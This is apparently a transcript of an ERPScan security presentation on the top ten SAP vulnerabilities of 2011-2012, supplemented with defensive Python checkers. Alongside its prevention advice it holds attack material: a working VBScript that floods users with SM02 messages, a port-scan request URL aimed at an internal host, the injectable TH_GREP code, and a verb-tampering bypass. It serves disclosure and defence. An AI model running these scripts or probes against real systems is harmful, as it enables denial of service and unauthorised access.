The presentation provides the list of top 10 SAP vulnerabilities (2011-2012) as well as ways of defense.
1. Authentication Bypass via Verb tampering
2. Authentication Bypass via the Invoker servlet
3. Buffer overflow in ABAP Kernel
4. Code execution via TH_GREP
5. MMC read SESSIONID
6. Remote portscan
7. Encryption in SAPGUI
8. BAPI XSS/SMBRELAY
9. XML Blowup DOS
10. GUI Scripting DOS
1. Invest in security to secure investments
SAP (In)Security: New and Best
Alexander Polyakov, CTO at ERPScan
2. About ERPScan
• The only 360-degree SAP Security solution - ERPScan Security Monitoring Suite for SAP
• Leader by the number of acknowledgements from SAP (150+)
• 60+ presentations at key security conferences worldwide
• 25 awards and nominations
• Research team - 20 experts with experience in different areas of security
• Headquarters in Palo Alto (US) and Amsterdam (EU)
4. Really
• The most popular business application
• More than 120000 customers
• 74% of Forbes 500
5. Agenda
• Intro
• SAP security history
• SAP on the Internet
• Most popular SAP issues (OLD)
• Top 10 latest interesting attacks (NEW)
• DEMOs
• Conclusion
6. 3 areas of SAP Security
2010 - Application platform security: prevents unauthorized access by both insiders and remote attackers. Solution: Vulnerability Assessment and Monitoring
2008 - ABAP Code security: prevents attacks or mistakes made by developers. Solution: Code audit
2002 - Business logic security (SOD): prevents attacks or mistakes made. Solution: GRC
7. Talks about SAP security
[Chart: number of talks about SAP security per year, 2006-2012]
Most popular:
• BlackHat
• HITB
• Troopers
• RSA
• Source
• DeepSec
• etc.
8. SAP Security notes
[Chart: number of SAP Security notes per year, 2001-2012]
By April 26, 2012, a total of 2026 notes
9. SAP vulnerabilities by type
[Chart: vulnerability counts by type; stats from 1Q 2012, 1Q 2010 and 4Q 2009]
12 - SQL Injection
11 - BOF
10 - Denial of service
9 - Remote Code Execution
8 - Verb tampering
7 - Code injection vulnerability
6 - Hard-coded credentials
5 - Unauthorized usage of application
4 - Information Disclosure
3 - Missing Auth check
2 - XSS/Unauthorised modification of
1 - Directory Traversal
10. Top problems by OWASP-EAS (Implementation issues)
• EASAI-1 Lack of patch management
• EASAI-2 Default passwords for application access
• EASAI-3 SOD conflicts
• EASAI-4 Unnecessary enabled application features
• EASAI-5 Open remote management interfaces
• EASAI-6 Lack of password lockout/complexity checks
• EASAI-7 Insecure options
• EASAI-8 Unencrypted communications
• EASAI-9 Insecure trust relations
• EASAI-10 Guest access
11. Top problems by BIZEC
• BIZEC TEC-01: Vulnerable Software in Use
• BIZEC TEC-02: Standard Users with Default Passwords
• BIZEC TEC-03: Unsecured SAP Gateway
• BIZEC TEC-04: Unsecured SAP/Oracle authentication
• BIZEC TEC-05: Insecure RFC interfaces
• BIZEC TEC-06: Insufficient Security Audit Logging
• BIZEC TEC-07: Unsecured SAP Message Server
• BIZEC TEC-08: Dangerous SAP Web Applications
• BIZEC TEC-09: Unprotected Access to Administration Services
• BIZEC TEC-10: Insecure Network Environment
• BIZEC TEC-11: Unencrypted Communications
12. Business Risks
Espionage
• Stealing financial information
• Stealing corporate secrets
• Stealing suppliers and customers list
• Stealing HR data
Sabotage
• Denial of service
• Modification of financial reports
• Access to technology network (SCADA) by trust relations
Fraud
• False transactions
• Modification of master data
• etc.
13. SAP on the Internet
MYTH: SAP systems can only be attacked by insiders
• We have collected data about SAP systems on the WEB
• Have various stats by countries, applications, versions
• Information from Google, Shodan, Nmap scan
15. SAP on the Internet
About 5000 systems, including Dispatcher, Message server, SapHostcontrol, Web-services
16. Top 10 vulnerabilities 2011-2012
1. Authentication Bypass via Verb tampering
2. Authentication Bypass via the Invoker servlet
3. Buffer overflow in ABAP Kernel
4. Code execution via TH_GREP
5. MMC read SESSIONID
6. Remote portscan
7. Encryption in SAPGUI
8. BAPI XSS/SMBRELAY
9. XML Blowup DOS
10. GUI Scripting DOS
17. 10 – GUI-Scripting DOS: Description (New)
• SAP users can run scripts which automate their user functions
• A script has the same rights in SAP as the user who launched it
• Security message which is shown to the user can be turned off in the registry
• Almost any user can use SAP Messages (SM02 transaction)
• It is possible to run a DOS attack on any user using a simple script
Author: Dmitry Chastukhin (ERPScan)
18. 10 – GUI-scripting: Details
If Not IsObject(application) Then
Set SapGuiAuto = GetObject("SAPGUI")
Set application = SapGuiAuto.GetScriptingEngine
End If
If Not IsObject(connection) Then
Set connection = application.Children(0)
End If
If Not IsObject(session) Then
Set session = connection.Children(0)
End If
If IsObject(WScript) Then
WScript.ConnectObject session, "on"
WScript.ConnectObject application, "on"
End If
do
a=a+1
session.findById("wnd[0]").maximize
session.findById("wnd[0]/tbar[0]/okcd").text = "/nsm02"
session.findById("wnd[0]/tbar[0]/btn[0]").press
session.findById("wnd[0]/tbar[1]/btn[34]").press
session.findById("wnd[1]/usr/txtEMLINE1").text = "hello"
session.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").setFocus
session.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").caretPosition = 0
session.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").setFocus
session.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").caretPosition = 0
session.findById("wnd[1]").sendVKey 4
session.findById("wnd[2]/usr/lbl[1,3]").setFocus
session.findById("wnd[2]/usr/lbl[1,3]").caretPosition = 15
session.findById("wnd[2]").sendVKey 2
session.findById("wnd[1]/usr/ctxtTEMSG-CLIENT").text = "800"
session.findById("wnd[1]/usr/ctxtTEMSG-LANGU").text = "en"
session.findById("wnd[1]/usr/ctxtTEMSG-LANGU").setFocus
session.findById("wnd[1]/usr/ctxtTEMSG-LANGU").caretPosition = 2
session.findById("wnd[1]/tbar[0]/btn[0]").press
Loop Until a>=1000
19. 10 – GUI-scripting: Other attacks
Other attacks, like changing banking accounts in LFBK, are also possible.
Script can be uploaded using:
• SAPGUI ActiveX vulnerability
• Teensy USB flash
• Any other method of client exploitation
20. 10 – GUI-scripting: Business risks
Ease of exploitation – Medium
Sabotage – High
Espionage – No
Fraud – No
22. 9 – XML Blowup DOS: Description (New)
• WEBRFC interface can be used to run RFC functions
• By default any user can have access
• Can execute at least RFC_PING
• SAP NetWeaver is vulnerable to malformed XML packets
• It is possible to run a DOS attack on the server using a simple script
• It is possible to run it over the Internet!
Author: Alexey Tyurin (ERPScan)
24. 9 – XML Blowup DOS: Business risks
Ease of exploitation – Medium
Espionage – No
Fraud – No
Sabotage – Critical
25. 9 – XML Blowup DOS: Prevention
• Disable WEBRFC
• Prevent unauthorized access to WEBRFC using S_ICF
• Install SAP notes 1543318 and 1469549
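Where WEBRFC cannot be switched off, the remaining defence is to refuse malformed or entity-expanding XML before the engine parses it. The guard below is an added example written for this slide, not ERPScan's or SAP's code: it uses the expat parser's declaration callbacks to reject any DTD or entity declaration before a single entity is expanded, and it caps payload size and nesting depth (both limits are assumed values, not SAP settings). The two sample documents are constructed; the second has the shape of an entity blowup at a harmless 10x10 scale.

```python
import xml.parsers.expat as expat


class UnsafeXML(ValueError):
    """Raised before any entity is expanded, so the parser never pays for the blowup."""


MAX_BYTES = 64 * 1024   # assumed ceiling for one RFC call body; tune per system
MAX_DEPTH = 32          # assumed nesting ceiling; RFC payloads are shallow

# Constructed samples (not captured traffic): a plain call and a miniature
# entity-expansion document of the same shape as a blowup, 10x10 instead of 10^9.
PLAIN_CALL = b'<?xml version="1.0"?><RFC_PING/>'
ENTITY_CALL = b"""<?xml version="1.0"?>
<!DOCTYPE call [
  <!ENTITY a "aaaaaaaaaa">
  <!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;">
]>
<RFC_PING>&b;</RFC_PING>"""


def check_rfc_xml(data: bytes) -> bool:
    """Accept only documents with no DTD, no entity declarations and bounded size/depth.

    Returns True, or raises UnsafeXML (policy) / expat.ExpatError (malformed input).
    """
    if len(data) > MAX_BYTES:
        raise UnsafeXML(f"{len(data)} bytes exceeds limit of {MAX_BYTES}")
    parser = expat.ParserCreate()
    depth = 0

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Fires at '<!DOCTYPE', before any <!ENTITY> inside it is seen.
        raise UnsafeXML(f"DOCTYPE {name!r} rejected: RFC calls do not need a DTD")

    def on_entity_decl(name, *rest):
        raise UnsafeXML(f"entity {name!r} rejected")

    def on_start(name, attrs):
        nonlocal depth
        depth += 1
        if depth > MAX_DEPTH:
            raise UnsafeXML(f"nesting deeper than {MAX_DEPTH} at <{name}>")

    def on_end(name):
        nonlocal depth
        depth -= 1

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.StartElementHandler = on_start
    parser.EndElementHandler = on_end
    parser.Parse(data, True)  # exceptions raised in handlers propagate from here
    return True


def is_safe(data: bytes) -> bool:
    """Boolean form of the check for use at an HTTP front end."""
    try:
        return check_rfc_xml(data)
    except (UnsafeXML, expat.ExpatError):
        return False


if __name__ == "__main__":
    print("plain call  :", is_safe(PLAIN_CALL))
    print("entity call :", is_safe(ENTITY_CALL))
```

The check is meant to sit in front of the ICF handler (a reverse proxy or filter), complementing rather than replacing the S_ICF authorization and the SAP notes listed above: a rejected document costs one parser setup, whereas an expanded one costs memory proportional to the expansion.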
26. 8 – BAPI script injection/hash stealing: Description
• SAP BAPI transaction fails to properly sanitize input
• Possible to inject JavaScript code or a link to a fake SMB server
• SAP GUI clients use Windows, so their credentials will be transferred to the attacker's host
Author: Dmitry Chastukhin (ERPScan)
27. 8 – BAPI script injection/hash stealing: Demo (New)
28. 8 – BAPI script injection/hash stealing: Business risks
Ease of exploitation – Low
Sabotage – High
Espionage – High
Fraud – High
29. 7 – SAP GUI bad encryption: Description (New)
• SAP FrontEnd can save encrypted passwords in shortcuts
• Shortcuts are stored in a .sap file
• This password uses a byte-XOR algorithm with a "secret" key
• The key has the same value for every installation of SAP GUI
• Any password can be decrypted in 1 second
Author: Alexey Sintsov (ERPScan)
31. 7 – SAP GUI bad encryption: Business risks
Sabotage – Medium
Fraud – High
Espionage – High
Ease of exploitation – Medium
32. 7 – SAP GUI bad encryption: Prevention
• Disable password storage in GUI
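Why the "1 second" rating holds, and why the only real prevention is the one on the slide, follows from two properties of byte-XOR with a fixed key: XOR is its own inverse, and the same key is used everywhere. The script below is an added illustration, not ERPScan's tool and not SAP GUI's actual scheme; the 16-byte key is constructed for the example and is not SAPGUI's key. It shows that one shortcut whose password the reader chose themselves yields the key, after which every other shortcut stored under the same key is readable.

```python
# Constructed 16-byte key standing in for a fixed per-product key; it is NOT
# SAPGUI's key, which this example neither knows nor needs.
FIXED_KEY = bytes.fromhex("5a17c3e9028b4d6f71a5e33c9b04d2f8")


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """Repeating-key byte XOR; calling it twice with the same key restores the input."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def store_password(password: str) -> bytes:
    """What a fixed-key byte-XOR 'encryption' of a shortcut password amounts to."""
    return xor_with_key(password.encode(), FIXED_KEY)


def recover_key_prefix(known_password: str, stored: bytes) -> bytes:
    """plaintext XOR ciphertext = the key bytes that were used (as many as the plaintext is long)."""
    return xor_with_key(stored, known_password.encode())


def decrypt_with_prefix(stored: bytes, key_prefix: bytes) -> str:
    """Any blob no longer than the recovered prefix is readable immediately."""
    if len(stored) > len(key_prefix):
        raise ValueError("recovered key prefix is shorter than this blob")
    return xor_with_key(stored, key_prefix).decode()


def demo():
    # A user saves one shortcut with a 16-character password they chose, so the
    # plaintext is known and the whole key falls out in one XOR.
    mine = store_password("Known-Passwd-16!")
    key_prefix = recover_key_prefix("Known-Passwd-16!", mine)
    # A second user's shortcut, 'protected' with the same fixed key, is now plain text.
    other = store_password("S3cretOfUser2")
    return key_prefix == FIXED_KEY, decrypt_with_prefix(other, key_prefix)


if __name__ == "__main__":
    same_key, revealed = demo()
    print("key recovered from one known shortcut:", same_key)
    print("second user's password:", revealed)
```

Because the recovered material is the key itself, not one password, the weakness is not repaired by longer or more complex passwords; only not storing the password in the shortcut removes it.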
33. 6 – Remote port scan via JSP: Description
• It is possible to scan the internal network from the Internet
• Authentication is not required
• SAP NetWeaver J2EE engine is vulnerable
• /ipcpricing/ui/BufferOverview.jsp?server=172.16.0.13&port=31337&password=&dispatcher=&targetClient=&view=
Author: Alexander Polyakov (ERPScan)
34. 6 – Remote port scan via JSP: Demo
[Screenshots: responses for a closed port, an HTTP port and a SAP port]
35. 6 – Remote port scan via JSP: Business risks
Ease of exploitation – High
Espionage – Medium
Fraud – No
Sabotage – Low
36. 6 – Remote port scan via JSP: Prevention
• Install SAP notes: 1548548, 1545883, 1503856, 948851
• Disable unnecessary applications
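Until the notes are applied, the probing described on the slide leaves a recognisable trace in the J2EE engine's HTTP access log: repeated requests to the BufferOverview.jsp path from one client, with a server= parameter naming an internal address and a changing port= value. The detector below is an added example, not ERPScan's or SAP's code; it assumes Common Log Format lines (the four sample lines are constructed, not real traffic) and uses only the path and parameter names shown on the slide.

```python
import re
import ipaddress
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines in Common Log Format (not real traffic): one client
# walking three ports on an internal host through BufferOverview.jsp, plus one
# ordinary request to the same engine.
SAMPLE_LOG = """\
198.51.100.7 - - [26/Apr/2012:10:15:01 +0000] "GET /ipcpricing/ui/BufferOverview.jsp?server=172.16.0.13&port=22&password=&dispatcher=&targetClient=&view= HTTP/1.1" 200 512
198.51.100.7 - - [26/Apr/2012:10:15:02 +0000] "GET /ipcpricing/ui/BufferOverview.jsp?server=172.16.0.13&port=80&password=&dispatcher=&targetClient=&view= HTTP/1.1" 200 498
10.0.0.21 - - [26/Apr/2012:10:15:02 +0000] "GET /irj/portal HTTP/1.1" 200 10231
198.51.100.7 - - [26/Apr/2012:10:15:04 +0000] "GET /ipcpricing/ui/BufferOverview.jsp?server=172.16.0.13&port=3200&password=&dispatcher=&targetClient=&view= HTTP/1.1" 200 530
"""

CLF = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
PROBE_PATH = "/ipcpricing/ui/BufferOverview.jsp"   # path named on the slide


def parse_clf(line):
    """Split one Common Log Format line into its fields, or return None."""
    m = CLF.match(line)
    return m.groupdict() if m else None


def classify_server(value):
    """Label the server= parameter: 'private', 'public', 'hostname' or 'empty'."""
    try:
        return "private" if ipaddress.ip_address(value).is_private else "public"
    except ValueError:
        return "hostname" if value else "empty"


def find_probes(lines):
    """One finding per request to the JSP that carries a server= target."""
    findings = []
    for line in lines:
        rec = parse_clf(line)
        if rec is None:
            continue
        url = urlsplit(rec["target"])
        if not url.path.endswith(PROBE_PATH):
            continue
        params = parse_qs(url.query, keep_blank_values=True)
        server = params.get("server", [""])[0]
        port = params.get("port", [""])[0]
        findings.append({
            "src": rec["src"], "time": rec["ts"], "server": server,
            "port": port, "server_kind": classify_server(server),
        })
    return findings


def probes_per_source(findings):
    """Distinct (server, port) pairs per client; several from one client is the scan pattern."""
    seen = {}
    for f in findings:
        seen.setdefault(f["src"], set()).add((f["server"], f["port"]))
    return {src: len(pairs) for src, pairs in seen.items()}


if __name__ == "__main__":
    found = find_probes(SAMPLE_LOG.splitlines())
    for f in found:
        print(f)
    print(probes_per_source(found))
```

A single hit with server_kind 'private' is already worth an alert on an Internet-facing engine, because the slide's point is that the request needs no authentication; the per-source count separates a scan from a one-off.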
37. 5 – MMC JSESSIONID stealing: Description (New)
• Remote management of SAP Platform
• By default, many commands go without auth
• Exploits implemented in Metasploit (by ChrisJohnRiley)
• Most of the bugs are information disclosure
• It is possible to find information about JSESSIONID
• Only if trace is ON
Can be authenticated as an existing user remotely
1) Original bug by ChrisJohnRiley
2) JSESSIONID by Alexey Sintsov and Alexey Tyurin (ERPScan)
39. 5 – MMC JSESSIONID stealing: Business risks
Espionage – Critical
Sabotage – Medium
Fraud – High
Ease of exploitation – Medium
40. 5 – MMC JSESSIONID stealing: Prevention
• The JSESSIONID by default will not be logged in the log file
• Don't use TRACE_LEVEL = 3 on production systems, or delete traces after use
• Other info: http://help.sap.com/saphelp_nwpi71/helpdata/en/d6/49543b1e49bc1fe10000000a114084/frameset.htm
41. 4 – Remote command execution in TH_GREP: Description
• RCE vulnerability in RFC module TH_GREP
• Found by Joris van de Vis
• SAP was not properly patched (1433101)
• We have discovered that the patch can be bypassed in Windows
Original bug by Joris van de Vis (erp-sec). Bypass by Alexey Tyurin (ERPScan)
42. 4 – RCE in TH_GREP: Details
elseif opsys = 'Windows NT'.
  " Windows branch: the pattern is wrapped in double quotes but not escaped
  concatenate '/c:"' string '"' filename into grep_params in character mode.
else. " Linux branch: single quotes in the pattern are escaped before quoting
  replace all occurrences of '''' in local_string with '''"''"'''.
  concatenate '''' local_string '''' filename into grep_params in character mode.
endif.
44. 4 - RCE in TH_GREP: More details
4 ways to execute the vulnerable program:
• Using transaction "SE37"
• Using transaction "SM51" (thanks to Felix Granados)
• Using remote RFC call "TH_GREP"
• Using SOAP RFC call "TH_GREP" via web
46. 4 – RCE in TH_GREP: Business risks
Sabotage – Medium
Fraud – High
Espionage – High
Ease of exploitation – Medium
47. 4 – RCE in TH_GREP: Prevention
• Install SAP notes 1580017, 1433101
• Prevent access to critical transactions and RFC functions
• Check the ABAP code of your Z-transactions for similar vulnerabilities
48. 3 - ABAP Kernel BOF: Description
• Presented by Andreas Wiegenstein at BlackHat EU 2011
• Buffer overflow in SAP kernel function C_SAPGPARAM
• When NAME field is more than 108 chars
• Can be exploited by calling an FM which uses C_SAPGPARAM
• Example of report – RSPO_R_SAPGPARAM
Author: (VirtualForge)
50. 3 – ABAP Kernel BOF: Business risks
Ease of exploitation – Medium
Espionage – Critical
Fraud – Critical
Sabotage – Critical
51. 3 – ABAP Kernel BOF: Prevention
• Install SAP notes:
  - 1493516 – Correcting buffer overflow in ABAP system call
  - 1487330 – Potential remote code execution in SAP Kernel
• Prevent access to critical transactions and RFC functions
• Check the ABAP code of your Z-transactions for critical calls
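Both the TH_GREP prevention slide and this one end with the same advice: review customer (Z) ABAP code for calls that reach the vulnerable function or kernel call. The scanner below is an added example of that review step, not ERPScan's or SAP's tool. It splits ABAP source into statements (so a call broken across lines is still caught, and a call mentioned only in a comment is not) and matches each statement against a small rule list: CALL FUNCTION 'TH_GREP', the C_SAPGPARAM kernel call, and the SYSTEM kernel call. It assumes kernel functions are invoked with the CALL '<name>' statement; the sample report and its parameter names are constructed for the example.

```python
import re

# Constructed ABAP source of a hypothetical customer report; parameter names are
# illustrative and this is not SAP's code.
SAMPLE_ABAP = """\
REPORT zcheck_host.
* comment only: TH_GREP must not be called here
DATA: lv_pattern TYPE string,
      lv_name TYPE c LENGTH 200.
PARAMETERS p_patt TYPE string.
lv_pattern = p_patt.
CALL FUNCTION 'TH_GREP'
  EXPORTING
    grep_string = lv_pattern.
CALL 'C_SAPGPARAM' ID 'NAME' FIELD lv_name ID 'VALUE' FIELD lv_value.
CALL FUNCTION 'RFC_PING'. " harmless
"""

# Each rule: a description naming the SAP notes the slides cite, and a pattern that is
# matched against one comment-free ABAP statement.
RULES = [
    ("TH_GREP call - RCE, see SAP notes 1580017 and 1433101",
     re.compile(r"\bCALL\s+FUNCTION\s+'TH_GREP'", re.IGNORECASE)),
    ("C_SAPGPARAM kernel call - BOF, see SAP notes 1493516 and 1487330",
     re.compile(r"\bCALL\s+'C_SAPGPARAM'", re.IGNORECASE)),
    ("SYSTEM kernel call - OS command execution",
     re.compile(r"\bCALL\s+'SYSTEM'", re.IGNORECASE)),
]


def statements(source):
    """Yield (first_line_no, text) per ABAP statement.

    '*' in column 1 comments out the line, '"' comments out the rest of a line,
    and a statement ends at a period outside a '...' literal.
    """
    buf, start, in_lit = [], None, False
    for no, raw in enumerate(source.splitlines(), 1):
        if raw.startswith("*"):
            continue
        for ch in raw:
            if ch == "'":
                in_lit = not in_lit        # '' inside a literal toggles twice, net zero
            elif ch == '"' and not in_lit:
                break                      # rest of the line is a comment
            if start is None and not ch.isspace():
                start = no
            buf.append(ch)
            if ch == "." and not in_lit:
                yield start, "".join(buf).strip()
                buf, start = [], None
        buf.append(" ")
        in_lit = False                     # literals do not span lines
    if start is not None:
        yield start, "".join(buf).strip()


def scan_abap(source, name="<source>"):
    """Return one finding per (statement, rule) match, with the statement's first line."""
    findings = []
    for line_no, stmt in statements(source):
        for rule, pattern in RULES:
            if pattern.search(stmt):
                findings.append({"file": name, "line": line_no,
                                 "rule": rule, "statement": stmt})
    return findings


if __name__ == "__main__":
    for f in scan_abap(SAMPLE_ABAP, "ZCHECK_HOST"):
        print(f"{f['file']}:{f['line']}: {f['rule']}")
```

A hit is a review item, not a verdict: the TH_GREP call on the slide is dangerous because an unvalidated pattern reaches the command line, so each finding should be traced back to where its input comes from.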
52. 2 – Invoker Servlet: Description
• Rapidly calls servlets by their class name
• Published by SAP in their security guides
• Possible to call any servlet from the application
• Even if it is not declared in WEB.XML
Can be used for auth bypass
54. 2 – Invoker servlet: Business risks
Ease of use – Very easy!
Espionage – High
Sabotage – High
Fraud – High
55. 2 - Invoker servlet: Prevention
• Update to the latest patch: 1467771, 1445998
• The "EnableInvokerServletGlobally" property of the servlet_jsp service must be "false"
If you can't install patches for some reason, you can check all WEB.XML files using the ERPScan web.xml scanner, or manually.
57. 1st Place – Verb Tampering
<security-constraint>
  <web-resource-collection>
    <web-resource-name>Restrictedaccess</web-resource-name>
    <url-pattern>/admin/*</url-pattern>
    <http-method>GET</http-method>
  </web-resource-collection>
  <auth-constraint>
    <role-name>admin</role-name>
  </auth-constraint>
</security-constraint>
What if we use HEAD instead of GET?
Author: Alexander Polyakov (ERPScan)
58. 1st Place – Verb tampering: Details
Remotely, without authentication!
• CTC – Secret interface for managing the J2EE engine
• Can be accessed remotely
• Can run user management actions:
  – Add users
  – Add to groups
  – Run OS commands
  – Start/Stop J2EE
60. 1 – Verb tampering: More details
If patched, can be bypassed by the Invoker servlet!
61. 1 – Verb tampering: Business risks
Espionage – Critical
Sabotage – Critical
Fraud – Critical
Ease of use – Very easy!
62. 1st Place – Verb tampering: Prevention
• Install SAP notes 1503579, 1616259
• Install other SAP notes about Verb Tampering (about 18)
• Scan applications using the ERPScan WEB.XML check tool or manually
• Secure WEB.XML by deleting all <http-method>
• Disable the applications that are not necessary
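The manual WEB.XML check above amounts to one question per security-constraint: does it enumerate HTTP methods, leaving every other verb unconstrained? The script below is an added example of that check and of the "delete all <http-method>" fix, written for this page; it is not ERPScan's WEB.XML check tool or SAP's code. It parses a descriptor with the standard library, reports each constraint that lists methods together with the patterns and roles it was meant to protect, and produces a version with the method elements removed so that each constraint covers all verbs. The sample descriptor is constructed, built around the constraint shown on the slide.

```python
import xml.etree.ElementTree as ET

# Constructed descriptor: the slide's GET-only constraint plus one that names no
# method and therefore already covers every verb.
SAMPLE_WEB_XML = """<web-app>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>Restricted access</web-resource-name>
      <url-pattern>/admin/*</url-pattern>
      <http-method>GET</http-method>
    </web-resource-collection>
    <auth-constraint>
      <role-name>admin</role-name>
    </auth-constraint>
  </security-constraint>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>Reports</web-resource-name>
      <url-pattern>/reports/*</url-pattern>
    </web-resource-collection>
    <auth-constraint>
      <role-name>user</role-name>
    </auth-constraint>
  </security-constraint>
</web-app>
"""


def _local(tag):
    """Tag name without a namespace prefix such as {http://java.sun.com/xml/ns/j2ee}."""
    return tag.rsplit("}", 1)[-1]


def _children(elem, name):
    return [c for c in elem if _local(c.tag) == name]


def _texts(elem, name):
    return [(c.text or "").strip() for c in _children(elem, name)]


def find_verb_tampering(web_xml_text):
    """One finding per security-constraint whose collection enumerates http-method."""
    root = ET.fromstring(web_xml_text)
    findings = []
    for sc in root.iter():
        if _local(sc.tag) != "security-constraint":
            continue
        roles = []
        for ac in _children(sc, "auth-constraint"):
            roles += _texts(ac, "role-name")
        for wrc in _children(sc, "web-resource-collection"):
            methods = _texts(wrc, "http-method")
            if methods:   # only the listed verbs are protected; all others bypass the constraint
                findings.append({
                    "resource": " ".join(_texts(wrc, "web-resource-name")),
                    "url_patterns": _texts(wrc, "url-pattern"),
                    "methods": methods,
                    "roles": roles,
                })
    return findings


def remove_http_methods(web_xml_text):
    """Return the descriptor with every <http-method> dropped, as the slide recommends."""
    root = ET.fromstring(web_xml_text)
    for wrc in list(root.iter()):
        if _local(wrc.tag) != "web-resource-collection":
            continue
        for hm in _children(wrc, "http-method"):
            wrc.remove(hm)
    return ET.tostring(root, encoding="unicode")


if __name__ == "__main__":
    for f in find_verb_tampering(SAMPLE_WEB_XML):
        print(f"{f['resource']!r} {f['url_patterns']} restricts only {f['methods']} "
              f"for roles {f['roles']}")
    print(find_verb_tampering(remove_http_methods(SAMPLE_WEB_XML)))
```

Run it over every WEB.XML deployed on the engine; the finding list is empty only when no constraint names a method, which is the state the prevention slide asks for.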
63. Conclusion
It is possible to be protected from almost all those kinds of issues, and we are working hard with SAP to make it secure.
SAP Guides
It's all in your hands:
• Regular Security assessments
• ABAP Code review
• Monitoring technical security
• Segregation of Duties
64. Future work
Many of the researched things cannot be disclosed now because of our good relationship with the SAP Security Response Team, whom I would like to thank for cooperation.
However, if you want to see new demos and 0-days, follow us at @erpscan and attend the future presentations:
• Just4Meeting in July (Portugal)
• BlackHat USA in July (Las Vegas)
65. Greetz to our crew who helped: Dmitriy Evdokimov, Alexey Sintsov, Alexey Tyurin, Pavel Kuzmin, Evgeniy Neelov.